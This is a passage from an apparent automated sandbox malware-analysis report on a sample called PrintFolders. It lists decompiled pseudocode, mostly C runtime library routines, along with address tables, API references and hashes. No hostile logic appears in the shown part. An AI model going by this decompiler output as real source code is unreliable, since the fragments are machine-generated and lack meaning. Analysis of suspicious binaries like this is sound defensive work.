												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E0041E2B8( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E0041E2B8(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E0040EBBF(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x0041befc
0x0041bf07
0x0041bf0e
0x0041bf11
0x0041bf12
0x0041bf15
0x0041bf19
0x0041bf1a
0x0041bf1d
0x0041bf2d
0x0041bf50
0x0041bf55
0x0041bf5a
0x0041c210
0x0041c210
0x0041c210
0x00000000
0x0041bf60
0x0041bf60
0x0041bf63
0x0041bf66
0x0041bf6c
0x0041bf72
0x0041bf75
0x0041bf77
0x0041bf7a
0x0041bf84
0x0041bf8a
0x00000000
0x00000000
0x0041bf90
0x0041bfb9
0x0041bfb9
0x0041bf92
0x0041bf92
0x0041bf9a
0x0041bfa1
0x0041bfa7
0x00000000
0x0041bfa9
0x0041bfa9
0x0041bfac
0x0041bfb7
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bfb7
0x0041bfa7
0x0041bfc6
0x0041bfc8
0x0041bfd1
0x0041bfd7
0x0041bfda
0x0041bfda
0x0041bfdd
0x0041bfe0
0x0041bfe0
0x0041bff0
0x0041bffe
0x0041c003
0x0041c00a
0x0041c00c
0x00000000
0x0041c012
0x0041c018
0x0041c025
0x0041c02e
0x0041c034
0x0041c041
0x0041c048
0x0041c04d
0x0041c050
0x0041c052
0x0041c290
0x0041c296
0x0041c297
0x0041c298
0x0041c299
0x0041c29a
0x0041c29b
0x0041c2a0
0x0041c2a3
0x0041c2a6
0x0041c2a7
0x0041c2b9
0x0041c2be
0x0041c2c0
0x0041c2c9
0x00000000
0x0041c2c9
0x0041c2c2
0x0041c2c5
0x0041c2c7
0x00000000
0x00000000
0x0041c2cf
0x0041c058
0x0041c058
0x0041c066
0x0041c069
0x0041c07f
0x0041c086
0x0041c08b
0x0041c06b
0x0041c06b
0x0041c073
0x00000000
0x0041c075
0x0041c075
0x0041c07b
0x0041c07b
0x0041c073
0x0041c092
0x0041c099
0x0041c09c
0x0041c19a
0x0041c19d
0x0041c1aa
0x0041c1ad
0x0041c1b5
0x0041c1b5
0x0041c19f
0x0041c1a5
0x0041c1a5
0x0041c0a2
0x0041c0a2
0x0041c0ae
0x0041c0b4
0x0041c0ba
0x0041c0bd
0x0041c0c3
0x0041c0c6
0x0041c0c9
0x00000000
0x00000000
0x0041c0cb
0x0041c0d4
0x0041c0d8
0x0041c0e1
0x0041c0e5
0x0041c0e6
0x0041c0ec
0x0041c0f2
0x0041c0f8
0x0041c0fb
0x00000000
0x00000000
0x0041c0fd
0x0041c11c
0x0041c11c
0x0041c11f
0x0041c13c
0x0041c141
0x0041c144
0x0041c146
0x0041c184
0x0041c148
0x0041c148
0x0041c14e
0x0041c153
0x0041c15b
0x0041c15c
0x0041c15c
0x0041c173
0x0041c17a
0x0041c17d
0x0041c17f
0x0041c17f
0x0041c18a
0x0041c190
0x0041c190
0x0041c195
0x00000000
0x0041c195
0x0041c0ff
0x0041c101
0x0041c106
0x0041c10c
0x0041c115
0x0041c118
0x0041c118
0x00000000
0x0041c101
0x0041c1b8
0x0041c1b8
0x0041c1bc
0x0041c1c4
0x0041c1ca
0x0041c1cd
0x0041c1d3
0x0041c1d5
0x0041c221
0x0041c227
0x0041c273
0x0041c273
0x0041c229
0x0041c22e
0x0041c22e
0x0041c234
0x0041c238
0x00000000
0x0041c23a
0x0041c23e
0x0041c247
0x0041c253
0x0041c258
0x0041c261
0x0041c267
0x0041c26a
0x0041c26a
0x0041c238
0x0041c279
0x0041c281
0x0041c287
0x0041c28a
0x0041c1d7
0x0041c1dd
0x0041c1e7
0x0041c1f9
0x0041c200
0x0041c20d
0x00000000
0x0041c20d
0x00000000
0x0041c1d5
0x0041c052
0x0041bfca
0x0041bfca
0x0041c212
0x0041c215
0x0041c216
0x0041c219
0x0041c220
0x0041c220
0x00000000
0x0041bfc8
0x0041bfc1
0x0041bfc3
0x0041bfc3
0x00000000
0x0041bfc3
0x00000000

APIs

Part of subcall function 0041CB63: GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000), ref: 0041CB68
Part of subcall function 0041CB63: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,74CB6490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

_free.LIBCMT ref: 0041C1E7
_free.LIBCMT ref: 0041C200
_free.LIBCMT ref: 0041C23E
_free.LIBCMT ref: 0041C247
_free.LIBCMT ref: 0041C253

Strings

C, xrefs: 0041C058

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: db53cc3fb368b299e4ebc727ca1c17a56f226d76f8d2124a3b5b37d9cb2993de
Instruction ID: ef45604bd07060d4e86bdf097be434cf7ae4fa59a7229b5fd9910e1095f225e5
Opcode Fuzzy Hash: db53cc3fb368b299e4ebc727ca1c17a56f226d76f8d2124a3b5b37d9cb2993de
Instruction Fuzzy Hash: 19B13775A412199BDB24DF59CC84AEAB7B4FB48304F5045AEE809A7391D734AED0CF88

Uniqueness

Uniqueness Score: -1.00%

Function 00421202 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00421202(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x43d054; // 0x7bd02ead
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E00419C8D(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E0041FE48(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E0040EBBF(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E0040EBA1(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E0041FE48(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E0041E95E(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E0041E95E(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E0040EBA1(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00420094();
									if(_t95 != 0) {
										E0040EBA1(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E0041ED2F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E0040F580(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E0041E95E(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E0041ED2F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E0040F580(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x00421207
0x00421208
0x00421209
0x00421210
0x00421215
0x0042121b
0x00421221
0x00421227
0x0042122a
0x0042122a
0x0042122d
0x0042122f
0x0042122f
0x0042122d
0x00421231
0x00421236
0x0042123d
0x00421240
0x00421240
0x00421261
0x00421263
0x00421266
0x0042126b
0x004213c9
0x004213cc
0x004213cd
0x004213ce
0x004213da
0x00421271
0x00421274
0x00421279
0x0042127b
0x0042127d
0x004212b4
0x004212b6
0x004212b8
0x004213be
0x004213be
0x004213c0
0x004213c1
0x004213c7
0x00000000
0x004213c7
0x004212c7
0x004212cc
0x004212d1
0x00000000
0x00000000
0x004212d7
0x004212ee
0x004212f2
0x00000000
0x00000000
0x004212f8
0x00421300
0x0042133d
0x00421342
0x00421344
0x00421346
0x00421377
0x00421379
0x0042137b
0x004213b7
0x004213b8
0x00000000
0x00421398
0x0042139a
0x0042139b
0x0042139f
0x004213db
0x004213de
0x004213a1
0x004213a1
0x004213a2
0x004213a2
0x004213a3
0x004213a4
0x004213a5
0x004213a6
0x004213ae
0x004213b5
0x004213e4
0x00000000
0x00000000
0x00000000
0x00000000
0x004213b5
0x0042137b
0x0042134a
0x00421365
0x0042136a
0x00000000
0x00000000
0x0042136c
0x00421372
0x00421372
0x00000000
0x00421372
0x0042134c
0x00421351
0x00421355
0x00000000
0x00000000
0x00421357
0x00000000
0x00421357
0x00421302
0x00421307
0x00000000
0x00000000
0x0042130f
0x00000000
0x00000000
0x0042132b
0x0042132f
0x00000000
0x00000000
0x00000000
0x00421335
0x00421284
0x0042129f
0x004212a4
0x004212af
0x004212af
0x00000000
0x004212af
0x004212a6
0x004212ac
0x004212ac
0x00000000
0x004212ac
0x00421286
0x0042128b
0x0042128f
0x00000000
0x00000000
0x00421291
0x00000000
0x00421291

APIs

__alloca_probe_16.LIBCMT ref: 00421286
__alloca_probe_16.LIBCMT ref: 0042134C
__freea.LIBCMT ref: 004213B8

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

__freea.LIBCMT ref: 004213C1
__freea.LIBCMT ref: 004213E4

Strings

tIB, xrefs: 00421214

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: tIB
API String ID: 1423051803-366005614
Opcode ID: 8bcbbfb6db70486236c34e29ace3ccf3bdd9e9482cebc72fef7cc3ecca7d4215
Instruction ID: af5f65ccc48ee5d63aac88402d645400baba8313a5c2bd7b01ea6e1089fcebf7
Opcode Fuzzy Hash: 8bcbbfb6db70486236c34e29ace3ccf3bdd9e9482cebc72fef7cc3ecca7d4215
Instruction Fuzzy Hash: E8511472700226ABEF209E55EC41FBF36AADF60754F64016BFC04E6260E73CDD5186A8

Uniqueness

Uniqueness Score: -1.00%

Function 100033D6 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E100033D6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x10015730);
				E10003C50(__ebx, __edi, __esi);
				_t34 =  *0x10017968; // 0x1
				if(_t34 > 0) {
					 *0x10017968 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E1000383A();
					 *(_t82 - 4) = 1;
					__eflags =  *0x10017ca0 - 2;
					if( *0x10017ca0 != 2) {
						E10003AD4(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x10015758);
						E10003C50(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E10003591( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t76 = E1000327C(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E10001000();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E10001000();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E100033D6(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E10003591( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E1000327C(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E10003591( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x10017968 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E10003905(__ebx, _t61, 1, __esi);
						E100037C7();
						E10003C23();
						 *0x10017ca0 =  *0x10017ca0 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E1000346B();
						_t54 = E10003AA6( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E10003478();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x100033d6
0x100033d6
0x100033d8
0x100033dd
0x100033e2
0x100033e9
0x100033f0
0x100033f8
0x100033fb
0x10003404
0x10003407
0x1000340a
0x10003411
0x10003480
0x10003485
0x10003486
0x10003488
0x1000348d
0x10003492
0x10003495
0x10003497
0x100034a8
0x100034a8
0x100034ac
0x100034af
0x100034bb
0x100034bb
0x100034c8
0x100034ca
0x100034cd
0x100034cf
0x100034df
0x100034e1
0x100034e4
0x100034e6
0x00000000
0x00000000
0x100034e6
0x100034b1
0x100034b1
0x100034b4
0x00000000
0x100034b6
0x100034b6
0x100034ec
0x100034ec
0x100034ed
0x100034ee
0x100034f1
0x100034f6
0x100034f8
0x100034fb
0x100034fe
0x10003500
0x10003502
0x10003504
0x10003505
0x10003506
0x10003509
0x1000350e
0x10003510
0x10003510
0x10003516
0x10003517
0x1000351c
0x10003522
0x10003522
0x10003502
0x10003527
0x10003529
0x10003530
0x1000353a
0x1000353c
0x1000353f
0x10003541
0x1000354d
0x10003575
0x10003575
0x1000352b
0x1000352b
0x1000352e
0x00000000
0x00000000
0x1000352e
0x10003529
0x100034b4
0x10003578
0x1000357f
0x10003499
0x10003499
0x1000349f
0x00000000
0x100034a1
0x100034a1
0x100034a1
0x1000349f
0x10003584
0x10003590
0x10003413
0x10003413
0x10003418
0x1000341d
0x10003422
0x10003429
0x1000342d
0x10003437
0x10003443
0x10003445
0x10003445
0x10003447
0x1000344a
0x10003451
0x10003456
0x00000000
0x10003456
0x100033eb
0x100033eb
0x10003458
0x1000345b
0x10003467
0x10003467

APIs

__RTC_Initialize.LIBCMT ref: 1000341D
___scrt_uninitialize_crt.LIBCMT ref: 10003437

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: fb96ed7170912c531198425769cf64f804bb219cb4c682d5ecc3c1bbbb0e391b
Instruction ID: f2d724fec1a198361f11823c952c0a5602674603fef4946e569f0555ef38e7cd
Opcode Fuzzy Hash: fb96ed7170912c531198425769cf64f804bb219cb4c682d5ecc3c1bbbb0e391b
Instruction Fuzzy Hash: CB41C372D04A65ABFB13CF64CC42B9F7BACEB446D2F11C119F8446A269D730AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 10004510 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E10004510(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _t56;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t80;
				signed int _t84;
				char _t86;
				intOrPtr _t90;
				intOrPtr* _t91;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				signed int _t105;
				void* _t108;
				void* _t109;
				void* _t115;

				_t94 = __edx;
				_t79 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t79 = E1000F5EB(__ecx,  *_t79);
				_t80 = _a8;
				_t6 = _t80 + 0x10; // 0x11
				_t103 = _t6;
				_push(_t103);
				_v20 = _t103;
				_v12 =  *(_t80 + 8) ^  *0x10017004;
				E100044D0(_t80, __edx, __edi, _t103,  *(_t80 + 8) ^  *0x10017004);
				E1000574C(_a12);
				_t56 = _a4;
				_t109 = _t108 + 0x10;
				_t100 =  *((intOrPtr*)(_t80 + 0xc));
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags = _t100 - 0xfffffffe;
					if(_t100 != 0xfffffffe) {
						_t94 = 0xfffffffe;
						E100058D0(_t80, 0xfffffffe, _t103, 0x10017004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t56;
					_v28 = _a12;
					 *((intOrPtr*)(_t80 - 4)) =  &_v32;
					if(_t100 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t84 = _v12;
							_t63 = _t100 + (_t100 + 2) * 2;
							_t80 =  *((intOrPtr*)(_t84 + _t63 * 4));
							_t64 = _t84 + _t63 * 4;
							_t85 =  *((intOrPtr*)(_t64 + 4));
							_v24 = _t64;
							if( *((intOrPtr*)(_t64 + 4)) == 0) {
								_t86 = _v5;
								goto L7;
							} else {
								_t94 = _t103;
								_t65 = E10005870(_t85, _t103);
								_t86 = 1;
								_v5 = 1;
								_t115 = _t65;
								if(_t115 < 0) {
									_v16 = 0;
									L13:
									_push(_t103);
									E100044D0(_t80, _t94, _t100, _t103, _v12);
									goto L14;
								} else {
									if(_t115 > 0) {
										_t66 = _a4;
										__eflags =  *_t66 - 0xe06d7363;
										if( *_t66 == 0xe06d7363) {
											__eflags =  *0x1001022c;
											if(__eflags != 0) {
												_t75 = E1000F280(__eflags, 0x1001022c);
												_t109 = _t109 + 4;
												__eflags = _t75;
												if(_t75 != 0) {
													_t105 =  *0x1001022c; // 0x1000422f
													 *0x10010164(_a4, 1);
													 *_t105();
													_t103 = _v20;
													_t109 = _t109 + 8;
												}
												_t66 = _a4;
											}
										}
										_t95 = _t66;
										E100058B0(_t66, _a8, _t66);
										_t68 = _a8;
										__eflags =  *((intOrPtr*)(_t68 + 0xc)) - _t100;
										if( *((intOrPtr*)(_t68 + 0xc)) != _t100) {
											_t95 = _t100;
											E100058D0(_t68, _t100, _t103, 0x10017004);
											_t68 = _a8;
										}
										_push(_t103);
										 *((intOrPtr*)(_t68 + 0xc)) = _t80;
										E100044D0(_t80, _t95, _t100, _t103, _v12);
										E10005890();
										asm("int3");
										_t70 = _v40;
										_t90 = _v36;
										__eflags = _t70 - _t90;
										if(_t70 != _t90) {
											_t91 = _t90 + 5;
											_t71 = _t70 + 5;
											__eflags = _t71;
											while(1) {
												_t97 =  *_t71;
												__eflags = _t97 -  *_t91;
												if(_t97 !=  *_t91) {
													break;
												}
												__eflags = _t97;
												if(_t97 == 0) {
													goto L24;
												} else {
													_t98 =  *((intOrPtr*)(_t71 + 1));
													__eflags = _t98 -  *((intOrPtr*)(_t91 + 1));
													if(_t98 !=  *((intOrPtr*)(_t91 + 1))) {
														break;
													} else {
														_t71 = _t71 + 2;
														_t91 = _t91 + 2;
														__eflags = _t98;
														if(_t98 != 0) {
															continue;
														} else {
															goto L24;
														}
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t72 = _t71 | 0x00000001;
											__eflags = _t72;
											return _t72;
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t100 = _t80;
						} while (_t80 != 0xfffffffe);
						if(_t86 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x10004510
0x10004517
0x1000451b
0x1000451c
0x10004522
0x1000452e
0x10004530
0x10004536
0x10004536
0x1000453f
0x10004541
0x10004544
0x10004547
0x1000454f
0x10004554
0x10004557
0x1000455a
0x10004561
0x100045bd
0x100045c0
0x100045c8
0x100045cf
0x00000000
0x100045cf
0x00000000
0x10004563
0x10004563
0x10004569
0x1000456f
0x10004575
0x100045e0
0x100045e9
0x10004577
0x10004577
0x10004577
0x1000457d
0x10004580
0x10004583
0x10004586
0x10004589
0x1000458e
0x100045a4
0x00000000
0x10004590
0x10004590
0x10004592
0x10004597
0x10004599
0x1000459c
0x1000459e
0x100045b4
0x100045d4
0x100045d4
0x100045d8
0x00000000
0x100045a0
0x100045a0
0x100045ea
0x100045ed
0x100045f3
0x100045f5
0x100045fc
0x10004603
0x10004608
0x1000460b
0x1000460d
0x1000460f
0x1000461c
0x10004622
0x10004624
0x10004627
0x10004627
0x1000462a
0x1000462a
0x100045fc
0x10004630
0x10004632
0x10004637
0x1000463a
0x1000463d
0x10004645
0x10004649
0x1000464e
0x1000464e
0x10004651
0x10004655
0x10004658
0x10004668
0x1000466d
0x10004671
0x10004674
0x10004677
0x10004679
0x1000467f
0x10004682
0x10004682
0x10004685
0x10004685
0x10004687
0x10004689
0x00000000
0x00000000
0x1000468b
0x1000468d
0x00000000
0x1000468f
0x1000468f
0x10004692
0x10004695
0x00000000
0x10004697
0x10004697
0x1000469a
0x1000469d
0x1000469f
0x00000000
0x100046a1
0x00000000
0x100046a1
0x1000469f
0x10004695
0x00000000
0x1000468d
0x100046a3
0x100046a5
0x100046a5
0x100046a9
0x1000467b
0x1000467b
0x1000467b
0x1000467e
0x1000467e
0x100045a2
0x00000000
0x100045a2
0x100045a0
0x1000459e
0x00000000
0x100045a7
0x100045a7
0x100045a9
0x100045b0
0x00000000
0x100045b2
0x00000000
0x100045b0
0x10004575
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 10004547
___except_validate_context_record.LIBVCRUNTIME ref: 1000454F
_ValidateLocalCookies.LIBCMT ref: 100045D8
__IsNonwritableInCurrentImage.LIBCMT ref: 10004603
_ValidateLocalCookies.LIBCMT ref: 10004658

Strings

csm, xrefs: 100045ED

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 71993e02da73fe6ea8203d8663dbfd28e3c5aac2b87050cf1c64cbd4c7b0a4a1
Instruction ID: e65ff753308d278a6817090cc45740b4f84ab4a7cb3d59c0f71bc0a74e6c746d
Opcode Fuzzy Hash: 71993e02da73fe6ea8203d8663dbfd28e3c5aac2b87050cf1c64cbd4c7b0a4a1
Instruction Fuzzy Hash: 4141C378E00218EBEF00CF68CC84A9E7BF5EF452A5F118055E8149B356DB72EA11CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0043EA60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0043EA97
___except_validate_context_record.LIBVCRUNTIME ref: 0043EA9F
_ValidateLocalCookies.LIBCMT ref: 0043EB28
__IsNonwritableInCurrentImage.LIBCMT ref: 0043EB53
_ValidateLocalCookies.LIBCMT ref: 0043EBA8

Strings

csm, xrefs: 0043EB3D

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
Instruction ID: 56324905b5cf03f36623b407c9bca58900183bbae34251306b30c85aa47bf572
Opcode Fuzzy Hash: 97abf38324731e32aa54c8af95c8715b679c63eee41a74b9c7ea5a5f1bcbe85c
